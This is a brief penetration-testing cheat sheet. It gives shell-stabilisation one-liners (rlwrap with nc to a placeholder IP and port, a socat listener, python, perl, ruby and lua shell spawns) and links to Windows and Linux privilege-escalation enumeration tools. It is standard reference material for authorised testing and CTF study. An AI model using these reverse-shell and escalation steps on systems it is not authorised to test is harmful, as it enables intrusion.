General Information

Spawn a tty:

# first
rlwrap nc localhost 80
# then
rlwrap -r -f . nc <IP ADDRESS> <PORT>

Linux upgrade shell

socat file:`tty`,raw,echo=0 tcp-listen:12345
python -c 'import pty; pty.spawn("/bin/sh")'
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')

Privilege Escalation Scripts:

Windows:

• Windows Exploit Suggester (Next-Generation): https://github.com/bitsadmin/wesng
• Sherlock: https://github.com/rasta-mouse/Sherlock
• Powersploit: https://github.com/PowerShellMafia/PowerSploit
• WinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Linux:

• Linux Exploit Suggester 2: https://github.com/jondonas/linux-exploit-suggester-2
• LinEnum: https://github.com/rebootuser/LinEnum
• UnixPriv Checker: https://github.com/pentestmonkey/unix-privesc-check
• LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

Other Resources:

PowerSharpPack:

• https://github.com/S3cur3Th1sSh1t/PowerSharpPack